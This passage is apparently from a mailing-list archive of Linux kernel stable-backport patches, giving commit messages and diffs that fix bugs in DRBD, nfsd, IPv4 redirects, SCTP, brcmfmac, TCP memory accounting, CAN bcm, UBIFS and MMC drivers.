rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);

tcp_sendmsg() used to totally ignore the size parameter.
57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.

Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.

Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=2336150
[4] http://e2.howsolveproblem.com/i/1175162/

This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.

It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).

It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().

Fixes: b411b3637fa7 ("The DRBD driver")
Cc: vi...@zeniv.linux.org.uk
Cc: christoph....@iteg.at
Cc: wolfga...@iteg.at
Reported-by: Christoph Lechleitner <christoph....@iteg.at>
Tested-by: Christoph Lechleitner <christoph....@iteg.at>
Signed-off-by: Richard Weinberger <ric...@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.el...@linbit.com>
Signed-off-by: Jens Axboe <ax...@fb.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/block/drbd/drbd_main.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
index a5dca6a..776fc08 100644
--- a/drivers/block/drbd/drbd_main.c
+++ b/drivers/block/drbd/drbd_main.c
@@ -1771,7 +1771,7 @@ int drbd_send(struct drbd_tconn *tconn, struct socket *sock,
* do we need to block DRBD_SIG if sock == &meta.socket ??
* otherwise wake_asender() might interrupt some send_*Ack !
*/
- rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
+ rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
if (rv == -EAGAIN) {
if (we_should_drop_the_connection(tconn, sock))
break;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Kinglong Mee <kingl...@gmail.com>

commit 3f42d2c428c724212c5f4249daea97e254eb0546 upstream.

Connection from alloc_conn must be freed through free_conn,
otherwise, the reference of svc_xprt will never be put.

Signed-off-by: Kinglong Mee <kingl...@gmail.com>
Signed-off-by: J. Bruce Fields <bfi...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/nfsd/nfs4state.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
index 4a58afa..b0878e1 100644
--- a/fs/nfsd/nfs4state.c
+++ b/fs/nfsd/nfs4state.c
@@ -2193,7 +2193,8 @@ out:
if (!list_empty(&clp->cl_revoked))
seq->status_flags |= SEQ4_STATUS_RECALLABLE_STATE_REVOKED;
out_no_session:
- kfree(conn);
+ if (conn)
+ free_conn(conn);
spin_unlock(&nn->client_lock);
return status;
out_put_session:
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Stephen Suryaputra Lin <stephen.sur...@gmail.com>

commit 969447f226b451c453ddc83cac6144eaeac6f2e3 upstream.

In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().

After commit 5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.

So, use the new_gw for neigh lookup.

Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).

Fixes: 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssu...@ieee.org>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/ipv4/route.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index cbad9b8..e59d633 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -713,7 +713,9 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
goto reject_redirect;
}

- n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw);
+ n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);
+ if (!n)
+ n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
if (!IS_ERR(n)) {
if (!(n->nud_state & NUD_VALID)) {
neigh_event_send(n, NULL);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Marcelo Ricardo Leitner <marcelo...@gmail.com>

commit bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 upstream.

Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.

The fix is to just move the check upwards so it's also validated for the
1st chunk.

Reported-by: Andrey Konovalov <andre...@google.com>
Tested-by: Andrey Konovalov <andre...@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo...@gmail.com>
Reviewed-by: Xin Long <lucie...@gmail.com>
Acked-by: Neil Horman <nho...@tuxdriver.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/sctp/sm_statefuns.c | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
index d9cbecb..df938b2 100644
--- a/net/sctp/sm_statefuns.c
+++ b/net/sctp/sm_statefuns.c
@@ -3428,6 +3428,12 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
commands);

+ /* Report violation if chunk len overflows */
+ ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
+ if (ch_end > skb_tail_pointer(skb))
+ return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
+ commands);
+
/* Now that we know we at least have a chunk header,
* do things that are type appropriate.
*/
@@ -3459,12 +3465,6 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
}
}

- /* Report violation if chunk len overflows */
- ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
- if (ch_end > skb_tail_pointer(skb))
- return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
- commands);
-
ch = (sctp_chunkhdr_t *) ch_end;
} while (ch_end < skb_tail_pointer(skb));

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Mike Snitzer <sni...@redhat.com>

commit 299f6230bc6d0ccd5f95bb0fb865d80a9c7d5ccc upstream.

v4.8-rc3 commit 99f3c90d0d ("dm flakey: error READ bios during the
down_interval") overlooked the 'drop_writes' feature, which is meant to
allow reads to be issued rather than errored, during the down_interval.

Fixes: 99f3c90d0d ("dm flakey: error READ bios during the down_interval")
Reported-by: Qu Wenruo <quwe...@cn.fujitsu.com>
Signed-off-by: Mike Snitzer <sni...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/md/dm-flakey.c | 27 ++++++++++++++++-----------
1 file changed, 16 insertions(+), 11 deletions(-)

diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
index a9a47cd..ace01a3 100644
--- a/drivers/md/dm-flakey.c
+++ b/drivers/md/dm-flakey.c
@@ -286,15 +286,13 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
pb->bio_submitted = true;

/*
- * Map reads as normal only if corrupt_bio_byte set.
+ * Error reads if neither corrupt_bio_byte or drop_writes are set.
+ * Otherwise, flakey_end_io() will decide if the reads should be modified.
*/
if (bio_data_dir(bio) == READ) {
- /* If flags were specified, only corrupt those that match. */
- if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
- all_corrupt_bio_flags_match(bio, fc))
- goto map_bio;
- else
+ if (!fc->corrupt_bio_byte && !test_bit(DROP_WRITES, &fc->flags))
return -EIO;
+ goto map_bio;
}

/*
@@ -331,14 +329,21 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio, int error)
struct flakey_c *fc = ti->private;
struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));

- /*
- * Corrupt successful READs while in down state.
- */
if (!error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
- if (fc->corrupt_bio_byte)
+ if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+ all_corrupt_bio_flags_match(bio, fc)) {
+ /*
+ * Corrupt successful matching READs while in down state.
+ */
corrupt_bio_data(bio, fc);
- else
+
+ } else if (!test_bit(DROP_WRITES, &fc->flags)) {
+ /*
+ * Error read during the down_interval if drop_writes
+ * wasn't configured.
+ */
return -EIO;
+ }
}

return error;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Eli Cooper <elic...@gmx.com>

commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 upstream.

skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.

This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.

Cc: sta...@vger.kernel.org
Signed-off-by: Eli Cooper <elic...@gmx.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/net/ip6_tunnel.h | 1 +
1 file changed, 1 insertion(+)

diff --git a/include/net/ip6_tunnel.h b/include/net/ip6_tunnel.h
index 4da5de1..b140c60 100644
--- a/include/net/ip6_tunnel.h
+++ b/include/net/ip6_tunnel.h
@@ -75,6 +75,7 @@ static inline void ip6tunnel_xmit(struct sk_buff *skb, struct net_device *dev)
int pkt_len, err;

nf_reset(skb);
+ memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
pkt_len = skb->len;
err = ip6_local_out(skb);

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Arend Van Spriel <arend.v...@broadcom.com>

commit ded89912156b1a47d940a0c954c43afbabd0c42c upstream.

User-space can choose to omit NL80211_ATTR_SSID and only provide raw
IE TLV data. When doing so it can provide SSID IE with length exceeding
the allowed size. The driver further processes this IE copying it
into a local variable without checking the length. Hence stack can be
corrupted and used as exploit.

Reported-by: Daxing Guo <freen...@gmail.com>
Reviewed-by: Hante Meuleman <hante.m...@broadcom.com>
Reviewed-by: Pieter-Paul Giesberts <pieter-pau...@broadcom.com>
Reviewed-by: Franky Lin <frank...@broadcom.com>
Signed-off-by: Arend van Spriel <arend.v...@broadcom.com>
Signed-off-by: Kalle Valo <kv...@codeaurora.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
index 301e572..2c52430 100644
--- a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
+++ b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
@@ -3726,7 +3726,7 @@ brcmf_cfg80211_start_ap(struct wiphy *wiphy, struct net_device *ndev,
(u8 *)&settings->beacon.head[ie_offset],
settings->beacon.head_len - ie_offset,
WLAN_EID_SSID);
- if (!ssid_ie)
+ if (!ssid_ie || ssid_ie->len > IEEE80211_MAX_SSID_LEN)
return -EINVAL;

memcpy(ssid_le.SSID, ssid_ie->data, ssid_ie->len);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Christian Borntraeger <bornt...@de.ibm.com>

commit 230fa253df6352af12ad0a16128760b5cb3f92df upstream.

ACCESS_ONCE does not work reliably on non-scalar types. For
example gcc 4.6 and 4.7 might remove the volatile tag for such
accesses during the SRA (scalar replacement of aggregates) step
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=58145)

Let's provide READ_ONCE/ASSIGN_ONCE that will do all accesses via
scalar types as suggested by Linus Torvalds. Accesses larger than
the machines word size cannot be guaranteed to be atomic. These
macros will use memcpy and emit a build warning.

Signed-off-by: Christian Borntraeger <bornt...@de.ibm.com>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/compiler.h | 74 ++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 74 insertions(+)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 6977192..9df1978 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -179,6 +179,80 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
# define __UNIQUE_ID(prefix) __PASTE(__PASTE(__UNIQUE_ID_, prefix), __LINE__)
#endif

+#include <uapi/linux/types.h>
+
+static __always_inline void data_access_exceeds_word_size(void)
+#ifdef __compiletime_warning
+__compiletime_warning("data access exceeds word size and won't be atomic")
+#endif
+;
+
+static __always_inline void data_access_exceeds_word_size(void)
+{
+}
+
+static __always_inline void __read_once_size(volatile void *p, void *res, int size)
+{
+ switch (size) {
+ case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
+ case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
+ case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
+#ifdef CONFIG_64BIT
+ case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
+#endif
+ default:
+ barrier();
+ __builtin_memcpy((void *)res, (const void *)p, size);
+ data_access_exceeds_word_size();
+ barrier();
+ }
+}
+
+static __always_inline void __assign_once_size(volatile void *p, void *res, int size)
+{
+ switch (size) {
+ case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
+ case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
+ case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
+#ifdef CONFIG_64BIT
+ case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
+#endif
+ default:
+ barrier();
+ __builtin_memcpy((void *)p, (const void *)res, size);
+ data_access_exceeds_word_size();
+ barrier();
+ }
+}
+
+/*
+ * Prevent the compiler from merging or refetching reads or writes. The
+ * compiler is also forbidden from reordering successive instances of
+ * READ_ONCE, ASSIGN_ONCE and ACCESS_ONCE (see below), but only when the
+ * compiler is aware of some particular ordering. One way to make the
+ * compiler aware of ordering is to put the two invocations of READ_ONCE,
+ * ASSIGN_ONCE or ACCESS_ONCE() in different C statements.
+ *
+ * In contrast to ACCESS_ONCE these two macros will also work on aggregate
+ * data types like structs or unions. If the size of the accessed data
+ * type exceeds the word size of the machine (e.g., 32 bits or 64 bits)
+ * READ_ONCE() and ASSIGN_ONCE() will fall back to memcpy and print a
+ * compile-time warning.
+ *
+ * Their two major use cases are: (1) Mediating communication between
+ * process-level code and irq/NMI handlers, all running on the same CPU,
+ * and (2) Ensuring that the compiler does not fold, spindle, or otherwise
+ * mutilate accesses that either do not require ordering or that interact
+ * with an explicit memory barrier or atomic instruction that provides the
+ * required ordering.
+ */
+
+#define READ_ONCE(x) \
+ ({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
+
+#define ASSIGN_ONCE(val, x) \
+ ({ typeof(x) __val; __val = val; __assign_once_size(&x, &__val, sizeof(__val)); __val; })
+
#endif /* __KERNEL__ */

#endif /* __ASSEMBLY__ */
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Eric Dumazet <edum...@google.com>

commit 20c64d5cd5a2bdcdc8982a06cb05e5e1bd851a3d upstream.

A malicious TCP receiver, sending SACK, can force the sender to split
skbs in write queue and increase its memory usage.

Then, when socket is closed and its write queue purged, we might
overflow sk_forward_alloc (It becomes negative)

sk_mem_reclaim() does nothing in this case, and more than 2GB
are leaked from TCP perspective (tcp_memory_allocated is not changed)

Then warnings trigger from inet_sock_destruct() and
sk_stream_kill_queues() seeing a not zero sk_forward_alloc

All TCP stack can be stuck because TCP is under memory pressure.

A simple fix is to preemptively reclaim from sk_mem_uncharge().

This makes sure a socket wont have more than 2 MB forward allocated,
after burst and idle period.

Signed-off-by: Eric Dumazet <edum...@google.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/net/sock.h | 10 ++++++++++
1 file changed, 10 insertions(+)

diff --git a/include/net/sock.h b/include/net/sock.h
index 6d2fbac..a46dd30 100644
--- a/include/net/sock.h
+++ b/include/net/sock.h
@@ -1422,6 +1422,16 @@ static inline void sk_mem_uncharge(struct sock *sk, int size)
if (!sk_has_account(sk))
return;
sk->sk_forward_alloc += size;
+
+ /* Avoid a possible overflow.
+ * TCP send queues can make this happen, if sk_mem_reclaim()
+ * is not called and more than 2 GBytes are released at once.
+ *
+ * If we reach 2 MBytes, reclaim 1 MBytes right now, there is
+ * no need to hold that much forward allocation anyway.
+ */
+ if (unlikely(sk->sk_forward_alloc >= 1 << 21))
+ __sk_mem_reclaim(sk, 1 << 20);
}

static inline void sk_wmem_free_skb(struct sock *sk, struct sk_buff *skb)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Felipe Balbi <felipe...@linux.intel.com>

commit fd9afd3cbe404998d732be6cc798f749597c5114 upstream.

According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
must have their completion signalled in a fininte
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."

In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.

Reported-by: Ville Syrjälä <ville....@linux.intel.com>
Tested-by: Ville Syrjälä <ville....@linux.intel.com>
Suggested-by: David Miller <da...@davemloft.net>
Signed-off-by: Felipe Balbi <felipe...@linux.intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/usb/gadget/u_ether.c | 8 --------
1 file changed, 8 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index aad066d..ef5c623 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -584,14 +584,6 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,

req->length = length;

- /* throttle high/super speed IRQ rate back slightly */
- if (gadget_is_dualspeed(dev->gadget))
- req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
- dev->gadget->speed == USB_SPEED_SUPER)) &&
- !list_empty(&dev->tx_reqs))
- ? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
- : 0;
-
retval = usb_ep_queue(in, req, GFP_ATOMIC);
switch (retval) {
default:
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Oliver Hartkopp <sock...@hartkopp.net>

commit deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.

Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang this patch adds a lock_sock() protection and
a check for unsuccessful proc_create_data() in bcm_connect().

Reference: http://marc.info/?l=linux-netdev&m=147732648731237

Reported-by: Andrey Konovalov <andre...@google.com>
Suggested-by: Cong Wang <xiyou.w...@gmail.com>
Signed-off-by: Oliver Hartkopp <sock...@hartkopp.net>
Acked-by: Cong Wang <xiyou.w...@gmail.com>
Tested-by: Andrey Konovalov <andre...@google.com>
Signed-off-by: Marc Kleine-Budde <m...@pengutronix.de>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/can/bcm.c | 32 +++++++++++++++++++++++---------
1 file changed, 23 insertions(+), 9 deletions(-)

diff --git a/net/can/bcm.c b/net/can/bcm.c
index 35cf02d..dd0781c 100644
--- a/net/can/bcm.c
+++ b/net/can/bcm.c
@@ -1500,24 +1500,31 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
struct sockaddr_can *addr = (struct sockaddr_can *)uaddr;
struct sock *sk = sock->sk;
struct bcm_sock *bo = bcm_sk(sk);
+ int ret = 0;

if (len < sizeof(*addr))
return -EINVAL;

- if (bo->bound)
- return -EISCONN;
+ lock_sock(sk);
+
+ if (bo->bound) {
+ ret = -EISCONN;
+ goto fail;
+ }

/* bind a device to this socket */
if (addr->can_ifindex) {
struct net_device *dev;

dev = dev_get_by_index(&init_net, addr->can_ifindex);
- if (!dev)
- return -ENODEV;
-
+ if (!dev) {
+ ret = -ENODEV;
+ goto fail;
+ }
if (dev->type != ARPHRD_CAN) {
dev_put(dev);
- return -ENODEV;
+ ret = -ENODEV;
+ goto fail;
}

bo->ifindex = dev->ifindex;
@@ -1528,17 +1535,24 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
bo->ifindex = 0;
}

- bo->bound = 1;
-
if (proc_dir) {
/* unique socket address as filename */
sprintf(bo->procname, "%lu", sock_i_ino(sk));
bo->bcm_proc_read = proc_create_data(bo->procname, 0644,
proc_dir,
&bcm_proc_fops, sk);
+ if (!bo->bcm_proc_read) {
+ ret = -ENOMEM;
+ goto fail;
+ }
}

- return 0;
+ bo->bound = 1;
+
+fail:
+ release_sock(sk);
+
+ return ret;
}

static int bcm_recvmsg(struct kiocb *iocb, struct socket *sock,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Vincent Stehlé <vincent...@intel.com>

commit c0082e985fdf77b02fc9e0dac3b58504dcf11b7a upstream.

An assertion in layout_in_gaps() verifies that the gap_lebs pointer is
below the maximum bound. When computing this maximum bound the idx_lebs
count is multiplied by sizeof(int), while C pointers arithmetic does take
into account the size of the pointed elements implicitly already. Remove
the multiplication to fix the assertion.

Fixes: 1e51764a3c2ac05a ("UBIFS: add new flash file system")
Signed-off-by: Vincent Stehlé <vincent...@intel.com>
Cc: Artem Bityutskiy <artem.bi...@linux.intel.com>
Signed-off-by: Artem Bityutskiy <artem.bi...@linux.intel.com>
Signed-off-by: Richard Weinberger <ric...@nod.at>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/ubifs/tnc_commit.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/ubifs/tnc_commit.c b/fs/ubifs/tnc_commit.c
index 52a6559..3f620c0 100644
--- a/fs/ubifs/tnc_commit.c
+++ b/fs/ubifs/tnc_commit.c
@@ -370,7 +370,7 @@ static int layout_in_gaps(struct ubifs_info *c, int cnt)

p = c->gap_lebs;
do {
- ubifs_assert(p < c->gap_lebs + sizeof(int) * c->lst.idx_lebs);
+ ubifs_assert(p < c->gap_lebs + c->lst.idx_lebs);
written = layout_leb_in_gaps(c, p);
if (written < 0) {
err = written;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Steffen Maier <ma...@linux.vnet.ibm.com>

commit 70369f8e15b220f50a16348c79a61d3f7054813c upstream.

In the hardware data router case, introduced with kernel 3.2
commit 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
the ELS/GS request&response length needs to be initialized
as in the chained SBAL case.

Otherwise, the FCP channel rejects ELS requests with
FSF_REQUEST_SIZE_TOO_LARGE.

Such ELS requests can be issued by user space through BSG / HBA API,
or zfcp itself uses ADISC ELS for remote port link test on RSCN.
The latter can cause a short path outage due to
unnecessary remote target port recovery because the always
failing ADISC cannot detect extremely short path interruptions
beyond the local FCP channel.

Below example is decoded with zfcpdbf from s390-tools:

Timestamp : ...
Area : SAN
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_san_req+0408
Record id : 1
Tag : fssels1
Request id : 0x<reqid>
Destination ID : 0x00<target d_id>
Payload info : 52000000 00000000 <our wwpn > [ADISC]
<our wwnn > 00<s_id> 00000000
00000000 00000000 00000000 00000000

Timestamp : ...
Area : HBA
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_hba_fsf_res+0740
Record id : 1
Tag : fs_ferr
Request id : 0x<reqid>
Request status : 0x00000010
FSF cmnd : 0x0000000b [FSF_QTCB_SEND_ELS]
FSF sequence no: 0x...
FSF issued : ...
FSF stat : 0x00000061 [FSF_REQUEST_SIZE_TOO_LARGE]
FSF stat qual : 00000000 00000000 00000000 00000000
Prot stat : 0x00000100
Prot stat qual : 00000000 00000000 00000000 00000000

Signed-off-by: Steffen Maier <ma...@linux.vnet.ibm.com>
Fixes: 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
Reviewed-by: Benjamin Block <bbl...@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <ha...@suse.com>
Signed-off-by: Martin K. Petersen <martin....@oracle.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/s390/scsi/zfcp_fsf.c | 4 ++++
1 file changed, 4 insertions(+)

diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8fa6bc4..8e0979c 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -990,8 +990,12 @@ static int zfcp_fsf_setup_ct_els_sbals(struct zfcp_fsf_req *req,
if (zfcp_adapter_multi_buffer_active(adapter)) {
if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_req))
return -EIO;
+ qtcb->bottom.support.req_buf_length =
+ zfcp_qdio_real_bytes(sg_req);
if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_resp))
return -EIO;
+ qtcb->bottom.support.resp_buf_length =
+ zfcp_qdio_real_bytes(sg_resp);

zfcp_qdio_set_data_div(qdio, &req->qdio_req,
zfcp_qdio_sbale_count(sg_req));
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Fabio Estevam <fabio....@nxp.com>

commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.

An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.

In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.

Fixes: e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio....@nxp.com>
Reviewed-by: Marek Vasut <ma...@denx.de>
Signed-off-by: Ulf Hansson <ulf.h...@linaro.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/mmc/host/mxs-mmc.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/mmc/host/mxs-mmc.c b/drivers/mmc/host/mxs-mmc.c
index 4278a17..f3a4232 100644
--- a/drivers/mmc/host/mxs-mmc.c
+++ b/drivers/mmc/host/mxs-mmc.c
@@ -674,13 +674,13 @@ static int mxs_mmc_probe(struct platform_device *pdev)

platform_set_drvdata(pdev, mmc);

+ spin_lock_init(&host->lock);
+
ret = devm_request_irq(&pdev->dev, irq_err, mxs_mmc_irq_handler, 0,
DRIVER_NAME, host);
if (ret)
goto out_free_dma;

- spin_lock_init(&host->lock);
-
ret = mmc_add_host(mmc);
if (ret)
goto out_free_dma;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Daniel Glöckner <d...@emlix.com>

commit 0ed50abb2d8fc81570b53af25621dad560cd49b3 upstream.

CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed to terminate
multi-block transfers only with CMD12.

The patch fixes the following problem:

mmc0: new MMC card at address 0001
mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
...
blk_update_request: I/O error, dev mmcblk0, sector 0
Buffer I/O error on dev mmcblk0, logical block 0, async page read
mmcblk0: unable to read partition table

Signed-off-by: Daniel Glöckner <d...@emlix.com>
Signed-off-by: Ulf Hansson <ulf.h...@linaro.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/mmc/card/block.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/mmc/card/block.c b/drivers/mmc/card/block.c
index a2863b7..ce34c49 100644
--- a/drivers/mmc/card/block.c
+++ b/drivers/mmc/card/block.c
@@ -2093,7 +2093,8 @@ static struct mmc_blk_data *mmc_blk_alloc_req(struct mmc_card *card,
set_capacity(md->disk, size);

